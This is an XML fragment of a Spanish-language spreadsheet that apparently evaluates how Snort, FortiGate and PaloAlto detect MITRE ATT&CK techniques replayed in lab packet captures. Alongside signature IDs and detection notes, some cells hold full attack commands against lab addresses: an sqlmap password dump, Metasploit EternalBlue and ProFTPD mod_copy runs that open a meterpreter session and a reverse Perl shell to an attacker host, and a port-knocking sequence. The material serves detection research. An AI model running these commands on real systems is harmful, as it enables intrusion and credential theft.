    <t>50447, 19439, 19440, 13990, 24172, 31939, 44416, 2016672, 2020506, 2006446, 2011037, 2010963, 2017808, 2006445, 2017337, 2011042, 2012885, 2009004</t>
  </si>
  <si>
    <t>50447, 2002749, 2002752, 2016672</t>
  </si>
  <si>
    <t>50447, 2002749, 2002752</t>
  </si>
  <si>
    <t xml:space="preserve">19439, 19440, 13990, 24172, 31939, 44416, 2020506, 2006446, 2011037, 2010963, 2017808, 2006445, 2017337, 2011042, 2012885, 2009004
</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Detectados</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: hay algunas inyecciones SQL que por su sintaxis no son detectadas por Snort</t>
    </r>
  </si>
  <si>
    <t>14984, 33338, 35823, 30514, 58005, 9999</t>
  </si>
  <si>
    <t>14984, 33338, 35823, 30514, 58005</t>
  </si>
  <si>
    <t>33338, 35823, 30514, 58005</t>
  </si>
  <si>
    <t>Sqlmap</t>
  </si>
  <si>
    <t>T1190-Sql_inyection1_[3].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte un posible intento al esquema de informacion de un servidor MySQL. Regla que detecte una sentencia SQL pudiendose tratar de una posible inyeccion SQL. Regla que detecte posible escaneo de vulnerabilidades de inyeccion SQL.</t>
  </si>
  <si>
    <t>Ejecucion de comando mediante sqlmap para probar diferentes SQL Injections a una página web. Comando: sqlmap -u http://192.168.2.2/payroll_app.php --forms --batch --passwords</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.5</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.5.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.5.5</t>
  </si>
  <si>
    <t>2002752, 2002749, 50447</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749</t>
  </si>
  <si>
    <t>9999, 58005</t>
  </si>
  <si>
    <t>curl, DVWA</t>
  </si>
  <si>
    <t>T1190-SQL_Injection_High_Bytes1_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte un posible intento de inyección SQL en la URL de una petición</t>
  </si>
  <si>
    <t>Instalado un servidor DVWA (servidor con vulnerabilidades) se realiza una inyección SQL a una URL añadiendo caracteres de relleno</t>
  </si>
  <si>
    <t>Manual [4] / 3.26</t>
  </si>
  <si>
    <t>Manual [4] / B.39</t>
  </si>
  <si>
    <t>Manual [4] / 4</t>
  </si>
  <si>
    <t>2034567, 2013028</t>
  </si>
  <si>
    <t>2002752, 2002749, 2034567, 2013028, 2002824</t>
  </si>
  <si>
    <t>2034567, 2013028, 2002824</t>
  </si>
  <si>
    <t>T1190-SQL_Injection_High_Bytes2_[4].pcapng</t>
  </si>
  <si>
    <t>T1190-Sql_inyection2_[2].pcapng</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.28</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.2</t>
  </si>
  <si>
    <t>1061, 1122, 1147</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 1122, 1147</t>
    </r>
  </si>
  <si>
    <t>1122, 1147</t>
  </si>
  <si>
    <t>2017808, 2009815, 2009714, 2006446, 2006445, 2008538, 1061, 1122, 1147</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808, 2009815, 2009714, 2006446, 2006445</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2008538, 1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 1122, 1147</t>
    </r>
  </si>
  <si>
    <t>1122, 1147, 2017808</t>
  </si>
  <si>
    <t>2009815, 2009714, 2006446, 2006445, 2008538, 1061</t>
  </si>
  <si>
    <t>2017808, 2009815, 2009714, 2006446, 2006445, 2008538, 1061, 1122, 1147, 19779, 50447, 31939, 7070</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2017808, 2009815, 2009714, 2006446, 2006445, 2008538, 1061, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1122, 1147, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">19779, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">31939, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>7070</t>
    </r>
  </si>
  <si>
    <t>1122, 1147, 2017808, 50447, 31939</t>
  </si>
  <si>
    <t>1122, 1147, 2017808, 31939</t>
  </si>
  <si>
    <t>2009815, 2009714, 2006446, 2006445, 2008538, 1061, 19779, 37070</t>
  </si>
  <si>
    <t>2002752, 2002749, 2012885, 2101061, 2017808, 2009815, 2009714, 2006446, 2006445, 2008538, 1061, 1122, 1147, 19779, 50447, 31939, 7070</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2012885</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101061, 2017808, 2009815, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009714,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2006446, 2006445, 2008538, 1061, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1122, 1147, 19779, 50447, 31939, 7070</t>
    </r>
  </si>
  <si>
    <t>1122, 1147, 2017808, 50447, 31939, 2002752, 2002749, 2012885</t>
  </si>
  <si>
    <t>1122, 1147, 2017808, 31939, 2002752, 2002749, 2012885</t>
  </si>
  <si>
    <t>2101061, 2017808, 2009815, 2009714, 2006446, 2006445, 2008538, 1061, 19779, 7070</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos/Mensajes/Instancias con Ataque Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el hecho de que se lleve a cabo una detección del 100% en instancias pero menor del 100% en flujos y mensajes se debe a la no asociación de algunas alertas a flujos y paquetes (estas alertas no contienen información del paquete asociado, por lo que no puede contabilizarse como una detección válida de flujo/mensaje, aunque a niveles prácticos actuaría como un 100%).</t>
    </r>
  </si>
  <si>
    <t>46199, 15621</t>
  </si>
  <si>
    <t>9999, 30514, 31477, 32658, 33338, 35823, 36241, 36242, 36248, 38195, 54608, 57735, 58005, 59128, 91523, 91528, 94307</t>
  </si>
  <si>
    <t>30514, 31477, 32658, 33338, 35823, 36241, 36242, 36248, 38195, 54608, 57735, 58005, 59128, 91523, 91528, 94307</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Establecimiento de tarea BITS en equipo Windows para garantizar persistencia trás reinicio del equipo</t>
  </si>
  <si>
    <t>BITSADMIN,METASPLOIT</t>
  </si>
  <si>
    <t>T1197-BITS_Jobs_[5].pcapng</t>
  </si>
  <si>
    <t>Descarga de Malware previa - T1105</t>
  </si>
  <si>
    <t>Regla genérica que detecte la presencia de cadenas en el contenido de los paquetes como "Microsoft BITS" y ".exe", alertando del intento de creación de una tarea BITS</t>
  </si>
  <si>
    <t>Ejecución de comandos para la creación de una tarea BITS con rastro de red</t>
  </si>
  <si>
    <t>Manual [5] /  4.3.1</t>
  </si>
  <si>
    <t>Manual [5] / C.5</t>
  </si>
  <si>
    <t>Manual [5] /  5.5.2</t>
  </si>
  <si>
    <t>El establecimiento de tareas BITS puede considerarse como tráfico legítimo o como ataque</t>
  </si>
  <si>
    <t>1917, 2035480, 2025644, 2022858, 2016141, 2021076, 2018959</t>
  </si>
  <si>
    <t>1917, 2021076</t>
  </si>
  <si>
    <t>2035480, 2025644, 2022858, 2016141, 2018959</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2035480, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF57BB8A"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2022858, 2016141, 2021076, 2018959, 1917, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2035480, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color theme="7"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2022858, 2016141, 2021076, 2018959, 1917, 50447</t>
    </r>
  </si>
  <si>
    <t>1917, 50447, 2021076</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2035480, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF57BB8A"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2022858, 2016141, 2018959</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1917, 50447, 2002752, 2002749, 2001117, 2035480, 2000419, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color theme="7"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101917, 2022858, 2016141, 2003595, 2021076, 2018959, 2101200, 2101620
</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749, 2001117, 2101917, 2101620</t>
  </si>
  <si>
    <t xml:space="preserve">1917, 50447, 2035480, 2000419, 2025644, 2022858, 2016141, 2003595, 2021076, 2018959, 2101200
</t>
  </si>
  <si>
    <t>1917, 2002752, 2002749, 50447, 2101917, 2101620</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101917, 2101620</t>
  </si>
  <si>
    <t>1917, 2002752, 2002749, 50447, 2101917, 2101620, 2001117, 2016141, 2101200</t>
  </si>
  <si>
    <t xml:space="preserve">2035480, 2000419, 2025644, 2022858, 2003595, 2018959
</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: Snortv2 no analiza 2 flujos, uno ICMPv6 y otro IGMP, mientras que Snortv3 cuenta los reseteos de conexión como conexiones nuevas, provocando más flujos de la cuenta. Esto no afecta al resultado final.                                                                                      </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> Instancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el ataque contiene la descarga del malware, pero se trata de un paso previo indispensable más que el propio ataque en sí, por lo que se considera como ataque colateral</t>
    </r>
  </si>
  <si>
    <t>15893, 33224</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el uso de un Shell Remoto</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos detectados PA:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto no detec protocolos como MDNS o ICMPv6</t>
    </r>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Uso de una conexión RDP sin proteger para el acceso a un equipo</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>T1199-Trusted_relationship_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">El ataque tiene un matiz clave. Si bien el ataque puede ser detectado por Snort (existen muchas variantes, aunque para esta instancia concreta, por ejemplo, sí que existe mecanismo de detección), el hecho de que se trate de un ataque procedente de un dominio de confianza infectado, dificulta su detección, pues bloquear estos paquetes podría imposibilitar comunicación con el dominio de confianza si no existiera amenaza </t>
  </si>
  <si>
    <t>Manual [4] /  3.5</t>
  </si>
  <si>
    <t>Manual [4] / B.5</t>
  </si>
  <si>
    <t>Manual [4] / 4.5</t>
  </si>
  <si>
    <t>El uso de una conexión RDP para ganar acceso a un equipo no siempre constituye un ataque, depende del contexto</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034857</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">,  2101448,  2101447,  </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001329,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">  2001330,  2009207,  2009206,  2009205,  2009208,  2002752,  2002749,  1448</t>
    </r>
  </si>
  <si>
    <t>2002752, 2009205, 2009206, 2009207, 2009208, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034857</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101448, 2101447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001329</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2001330, 1448</t>
    </r>
  </si>
  <si>
    <t>1448, 2001330, 2101448, 20101447, 2001329, 2009207, 2009206, 2009205, 2009208</t>
  </si>
  <si>
    <t>2009207, 2009206, 2009205, 2009208</t>
  </si>
  <si>
    <t>1448, 2001330, 2101448, 20101447, 2001329</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza un flujo ICMP, pero no afecta a los resultados</t>
    </r>
  </si>
  <si>
    <t>ms-rdp -- remote-access</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Adición de Hardware</t>
  </si>
  <si>
    <t>SSH Server + USB(Simular USB con MV con SO)</t>
  </si>
  <si>
    <t>T1200-Hardware_Additions_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique desviaciones en el tráfico de red, tales como metadatos o protocolos de gestión (DHCP,...) fuera de los habituales</t>
  </si>
  <si>
    <t>Aparición de una nueva MV en el entorno de la víctima simulando la insercion de un USB tipo Pwn Plug que se utiliza como nodo de acceso a la red de la víctima para posteriormente, aprovechando que el puerto de la víctima esta abierto, acceder al equipo.</t>
  </si>
  <si>
    <t>Manual [5] /  4.2.1</t>
  </si>
  <si>
    <t>Manual [5] / C.6</t>
  </si>
  <si>
    <t xml:space="preserve"> Manual [5] / 5.3.4</t>
  </si>
  <si>
    <t>Añadir un equipo hardware a una red siempre es un ataque</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Ataque con Botnet</t>
  </si>
  <si>
    <t>Ares, Screenshot and key logging</t>
  </si>
  <si>
    <t>T1203-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [4] / B.35</t>
  </si>
  <si>
    <t>Un ataque con botnet siempre es un ataque</t>
  </si>
  <si>
    <t>2009714, 50447, 31939, 31860, 7070, 15188</t>
  </si>
  <si>
    <t>2002749, 2002752, 2012885, 2009004, 2009714, 50447, 31939, 31860, 7070, 15188</t>
  </si>
  <si>
    <t>2012885, 2009004, 2009714, 50447, 31939, 31860, 7070, 15188</t>
  </si>
  <si>
    <t xml:space="preserve">9999, 14984, 55310, 94328, </t>
  </si>
  <si>
    <t xml:space="preserve">14984, 55310, 94328, </t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Enlace malicioso</t>
  </si>
  <si>
    <t>wget</t>
  </si>
  <si>
    <t>T1204.001-malicious_link_[3].pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías</t>
  </si>
  <si>
    <t>Redireccion al pinchar en un enlace a un sitio malicioso. Comando : wget http://172.16.1.2 (Desde la víctima)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.17</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.17.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.17.5</t>
  </si>
  <si>
    <t>Un enlace malicioso a veces puede ser considerado como tráfico legítimo dependiendo de las circuntstancias</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Esconder y activar un puerto de forma remota</t>
  </si>
  <si>
    <t>Knockd</t>
  </si>
  <si>
    <t>T1205.001-Port_Knocking_[3].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en base a una actividad sospechosa en un puerto concreto</t>
  </si>
  <si>
    <t>Ocultar y activar un puerto remotamente, haciendo primero peticiones a ciertos puertos de forma secuencial. Comando: knock -v 172.16.2.2 7000 8000 9000</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.11</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.11.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.11.5</t>
  </si>
  <si>
    <t>El Port Knocking siempre se considera un ataque</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>DCShadow: registro de un DC fraudulento para habilitar la manipulación de datos en un entorno Active Directory</t>
  </si>
  <si>
    <t>T1207-Rogue_domain_controller_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte una llamada a la función DRSUAPI_REPLICA_ADD (5), o un intento de aprovechamiento de una vulnerabilidad de la misma</t>
  </si>
  <si>
    <t>Manual [4] /  3.10</t>
  </si>
  <si>
    <t>Manual [4] / B.10</t>
  </si>
  <si>
    <t>Manual [4] / 4.10</t>
  </si>
  <si>
    <t>El registro de un DC fraudulento para habilitar la manipulación de datos siempre es un ataque (aunque las tareas realizadas posteriormente puedan realizarse también en un entorno legítimo)</t>
  </si>
  <si>
    <t>44604, 44489, 53374, 53375</t>
  </si>
  <si>
    <t>53374, 53375</t>
  </si>
  <si>
    <t>2002752, 2002749, 2044666, 44604, 44489, 53374, 53375</t>
  </si>
  <si>
    <t>2044666, 44604, 44489, 53374, 53375</t>
  </si>
  <si>
    <t>44489, 2002752, 2002749, 2044666</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: ambas versiones de Snort detectan el número de flujos correcto. La variación de valores se debe puramente a la naturaleza de la identificación de flujos de Snort frente a tranalyzer</t>
    </r>
  </si>
  <si>
    <t>56497, 92322, 54406</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>EternalBlue</t>
  </si>
  <si>
    <t>T1210-Eternal_blue_[2].pcapng</t>
  </si>
  <si>
    <t>SMB</t>
  </si>
  <si>
    <t>Regla genérica que detecte uso de EternalBlue</t>
  </si>
  <si>
    <t>Uso de exploit Eternalblue para obtener movimiento lateral y establecimiento de meterpreter. Comando: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; run -z; sessions -c getuid; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.1</t>
  </si>
  <si>
    <t>Manual [4] / B.29</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.4</t>
  </si>
  <si>
    <t>El aprovechamiento de vulnerabilidades en el servicio SMB para realizar diferentes tareas maliciosas siempre constituye un ataque</t>
  </si>
  <si>
    <t>42944, 2102465, 2025992, 2025649, 2025650, 2024297, 2035480, 2025644</t>
  </si>
  <si>
    <t>42944, 2102465, 2035480, 2025644</t>
  </si>
  <si>
    <t>2025992, 2025649, 2025650, 2024297</t>
  </si>
  <si>
    <t>2102465, 2025992, 2025649, 2025650, 2024297, 2035480, 2025644, 44487, 44485, 44489, 5730, 42944</t>
  </si>
  <si>
    <t>2102465, 2035480, 2025644, 44487, 44485, 44489, 5730</t>
  </si>
  <si>
    <t>42944, 2025992, 2025649, 2025650, 2024297</t>
  </si>
  <si>
    <t xml:space="preserve">44487, 44485, 44489, 5730, 42944, 2002752, 2002749, 2044666, 2023997, 2044665, 2102465, 2025992, 2025649, 2025650, 2024766, 2024297, 2035480, 2000419, 2025644
</t>
  </si>
  <si>
    <t>2002752, 2002749, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>44487, 44485, 44489, 5730, 42944, 2044666, 2023997, 2044665, 2102465, 2025992, 2025649, 2025650, 2024766, 2024297</t>
  </si>
  <si>
    <t xml:space="preserve">44487, 44485, 44489, 5730, 2002752, 2002749, 2044666, 2023997, 2044665, 2102465, 2024766, 2035480, 2000419, 2025644
</t>
  </si>
  <si>
    <t xml:space="preserve">44487, 44485, 44489, 5730, 2002752, 2002749, 2044666, 2023997, 2044665, 2102465, 2035480, 2000419, 2025644
</t>
  </si>
  <si>
    <t>43799, 43963, 43796</t>
  </si>
  <si>
    <t>43796, 43963, 43799</t>
  </si>
  <si>
    <t>31696, 90807, 31710, 86360</t>
  </si>
  <si>
    <t>31696, 90807, 86360</t>
  </si>
  <si>
    <t>Ejecución de código remoto basado en vulnerabilidades de servidor FTP</t>
  </si>
  <si>
    <t>T1210-Remote_code_execution_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte intento de ejecucion remota de codigo en servidor FTP </t>
  </si>
  <si>
    <t>Uso de comandos SITE/CPFR/CPTO en la version 1.3.5 de ProFTPD  que permite copiar ficheros a cualquier usuario no autenticado. Comando: msfconsole -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 192.168.2.2; set SITEPATH /var/www/html; set LHOST 192.168.1.3; set LPORT 4444; set payload cmd/unix/reverse_perl; run -z; sessions -c ls; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.2</t>
  </si>
